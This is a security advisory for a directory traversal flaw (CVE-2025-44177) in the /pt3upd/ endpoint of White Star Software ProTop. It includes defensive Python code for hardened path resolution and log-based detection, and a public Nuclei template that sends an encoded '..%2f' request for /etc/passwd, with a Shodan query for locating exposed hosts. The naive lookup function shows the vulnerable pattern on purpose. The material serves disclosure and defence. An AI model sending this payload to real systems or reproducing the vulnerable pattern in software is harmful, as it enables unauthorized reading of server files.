CVE-2025-44177: White Star Software ProTop - Directory Traversal

Date: 2025-08-01 | Affected software: White Star Software ProTop | PoC: public

Vulnerability description

A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences.
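The two defender-side routines below are an added example and are not White Star Software's or ProTop's code. They show the bug class the advisory describes from the mitigation and detection side: a naive file lookup that percent-decodes the requested name and joins it onto the update directory (the pattern that lets ..%2f escape), a hardened lookup that fully decodes, resolves and checks containment before serving anything, and a small detector that runs over access-log lines and flags traversal against the /pt3upd/ endpoint even when the sequences are double-encoded. The endpoint name and the ..%2f payload come from the advisory; the base directory, the function names and the log lines are assumptions constructed for this example.

```python
"""Added example (not ProTop's code): hardened path resolution and log-based
detection for encoded directory traversal against a download endpoint.

Assumptions: the update files live under BASE_DIR; the access log is in
common/combined format; all function names here are hypothetical.
"""
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Hypothetical directory the /pt3upd/ endpoint serves files from.
BASE_DIR = "/opt/protop/pt3upd"


def naive_lookup(base_dir: str, requested: str) -> str:
    """The vulnerable pattern: decode once, join, never check containment.

    '..%2f..%2f..%2f..%2fetc%2fpasswd' decodes to '../../../../etc/passwd',
    and the join happily walks out of base_dir.
    """
    return os.path.join(base_dir, unquote(requested))


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so that a
    double-encoded '..%252f' is seen as '../' and not as a harmless literal."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def safe_resolve(base_dir: str, requested: str) -> Optional[str]:
    """Resolve `requested` under base_dir; return None if it would escape.

    Decodes fully, normalises backslashes, rejects NUL bytes, strips a leading
    '/' so os.path.join cannot be reset to an absolute path, then uses realpath
    so '..' and symlinks are collapsed before the containment check.
    """
    decoded = fully_decode(requested).replace("\\", "/")
    if "\x00" in decoded:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded.lstrip("/")))
    # commonpath avoids the prefix bug where '/opt/app' would match '/opt/app2'
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Matches the request line inside a common/combined-format access log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# A '..' path component, after decoding and slash normalisation.
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")


def flag_traversal(log_lines: List[str], endpoint: str = "/pt3upd/") -> List[Tuple[str, str]]:
    """Return (raw_path, decoded_path) for requests to `endpoint` whose decoded
    path contains a '..' component. Decoding happens before matching, so both
    single- and double-encoded sequences are caught."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        raw_path = m.group("path").split("?", 1)[0]
        if not raw_path.startswith(endpoint):
            continue
        decoded = fully_decode(raw_path).replace("\\", "/")
        if TRAVERSAL_RE.search(decoded):
            hits.append((raw_path, decoded))
    return hits


# Constructed sample log lines (not real traffic): one legitimate download,
# the single-encoded payload from the advisory, a double-encoded variant
# that a naive matcher would miss, and an unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET /pt3upd/protop-4.4.2.zip HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Aug/2025:10:00:02 +0000] "GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1843',
    '203.0.113.5 - - [01/Aug/2025:10:00:03 +0000] "GET /pt3upd/..%252f..%252f..%252fetc%252fhosts HTTP/1.1" 403 0',
    '198.51.100.7 - - [01/Aug/2025:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 900',
]


if __name__ == "__main__":
    for raw, decoded in flag_traversal(SAMPLE_LOG):
        print(f"traversal attempt: {raw} -> {decoded}")
    print("safe:", safe_resolve(BASE_DIR, "protop-4.4.2.zip"))
    print("blocked:", safe_resolve(BASE_DIR, "..%2f..%2f..%2f..%2fetc%2fpasswd"))
```

The detector only looks at the request path, so it flags attempts regardless of the response code; the 403 in the third sample line is exactly the case where a blocked attempt is still worth alerting on. The Nuclei template below, by contrast, matches on the response (the `root:` line and the `filename="passwd"` header), which is how you confirm the host is actually vulnerable rather than merely being probed.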

PoC code [public]

id: CVE-2025-44177

info:
  name: White Star Software ProTop - Directory Traversal
  author: s-cu-bot
  severity: high
  description: |
    A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences.
  remediation: |
    Upgrade White Star Software ProTop to a version after v4.4.2-2024-11-27.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-44177
    - https://client.protop.co.za/
    - https://wss.com/
    - https://gist.github.com/stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2025-44177
    epss-score: 0.07063
    epss-percentile: 0.91151
    cwe-id: CWE-22
    cpe: cpe:2.3:a:wss:protop:4.4.2-2024-11-27:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: white-star-software
    product: protop
    shodan-query: html:"<title>ProTop"
  tags: cve,cve2025,lfi,traversal,protop,whitestar,vkev

http:
  - raw:
      - |
        GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: header
        words:
          - 'application/octet-stream'
          - 'filename="passwd"'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220476a13243fe70c5a4d17ca9f3d9836b48e37e110100df5e61e10eb68744de000022100ca2034ed498816291b53e418efd74562ff71cc1717a30697f3f36ba95d261105:922c64590222798bb761d5b6d8e72950